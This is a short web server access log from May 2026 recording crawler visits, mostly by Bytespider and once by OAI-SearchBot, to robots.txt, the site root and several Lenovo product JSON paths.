162.159.108.83 - - [18/May/2026:13:00:03 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
162.159.108.83 - - [18/May/2026:13:38:38 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
172.64.213.9 - - [18/May/2026:16:08:02 +0800] "GET /index.php/lenovo/json/EPC300/ HTTP/1.1" 200 1815 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
162.158.119.176 - - [18/May/2026:16:08:07 +0800] "GET / HTTP/1.1" 200 12727 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
172.70.223.159 - - [18/May/2026:16:08:26 +0800] "GET /lenovo/json/V310-15IKB HTTP/1.1" 200 3052 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
